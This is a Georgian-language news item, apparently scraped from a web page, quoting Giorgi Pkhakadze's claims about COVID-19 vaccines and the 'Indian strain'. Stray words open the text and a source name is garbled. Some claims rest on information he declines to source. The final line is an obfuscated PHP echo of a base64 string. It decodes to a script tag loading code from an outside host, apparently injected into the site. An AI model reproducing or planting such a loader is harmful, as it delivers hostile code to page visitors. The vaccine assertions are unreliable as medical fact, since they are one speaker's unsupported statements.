celsiusi
ავერსი შნაიდერი
პროფესორის, ორგანიზაციის – „აკრედიტაცია საზღვრების გარეშე“ – ხელმძვანელის, გიორგი ფხაკაძის განცხადებით, ვაქცინებთან დაკავშირებით კვლევები ინტენსიურად გრძელდება , მაგრამ ამ დრომდე არ არსებობს არანაირი კვლევა, რომ "ინდურ შტამზე" რომელიმე ვაქცინა მოქმედებდეს. 
 
მისივე განცხადებით, "ფაიზერი" შესაძლოა ნაწილობრივ მოქმედებდეს, "ინდურ შტამზე", თუმცა სრულად ამის თქმა არავის შეუძლია. 
 
“რაც შეეხება ჩინურ ვაქცინებს, ვაქცინაზე კვლევებს აწარმოებენ სხვადასხვა ქვეყნები. "სინოფარმზე" არსებობს 24-მდე  ოფიციალური კვლევა, ყველა ამ კვლევების დასკვნები არის პროცენტულად განსხვავებული და არცერთი ერთმანეთს არ დაემთხვა, ეს უკვე არის ძალიან ცუდი ფაქტი. მაგალითად თურქებმა თქვეს, რომ 91.1 %-ია მისი ეფექტურობაო, - სასაცილოა. ყველაზე მნიშვნელოვანია ის რომ თავად ჩინეთმა გამოაცხადა მისი ვაქცინის ეფექტურობა 50.4 %-ი დასხვები ასე ამბობენ, არაბებმა 86%-იაო და ა.შ. გარდა ამისა უნდა ითქვას, რომ ამ "სითხეზე" გვაქვს სამი სავალდებულო საფეხურის კვლევიდან მხოლოდ პირველი და მეორე საფეხურის კლინიკური კვლევები, მესამეს რაც შეეხება, ჩინურ ვაქცინებზე ეს საერთოდ არ მოიპოვება დღემდე. 
 
რაც შეეხება "ასტრაზენეკას" ის ვიცით, რომ "ბრაზილიურ შტამზე" ისედაც არ მოქმედებდა, შესაბამისად, ვინაიდან "ინდური შტამი" ითავსებს არაერთ შტამს ეს ვაქცინა აქ არ განიხილება.”- აცხადებს ფხაკაძე საინფორმაციო სააგენტო Bუსინესს ტიმე- თან. 
ამასთან, გიორგი ფხაკაძე დარწმუნებულია რომ საქართველოში "ინდური შტამი" უკვე შემოსულია. 
 
“ყველაფრის თქმა არ შემიძლია,თუ საიდან მაქვს ინფორმაცია. დანამდვილებით, შემიძლია გითხრათ, საქართველოში "ინდური შტამი" უკვე შემოსულია. მე თქვენ დიდი ხნის წინ გითხარით "ბრიტანულ შტამზე", რომ ის უკვე იყო შემოსული საქართველოში, ასევე გითხარით იანვარში  ინტერვიუს დროს , რომ მესამე ტალღა იქნებოდა აპრილში, ახლე გეუბნებით, რომ საქართველოში "ინდური შტამი" უკვე გვაქვს”- განაცხადა გიორგი ფხაკაძემ.
 
 
8867
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");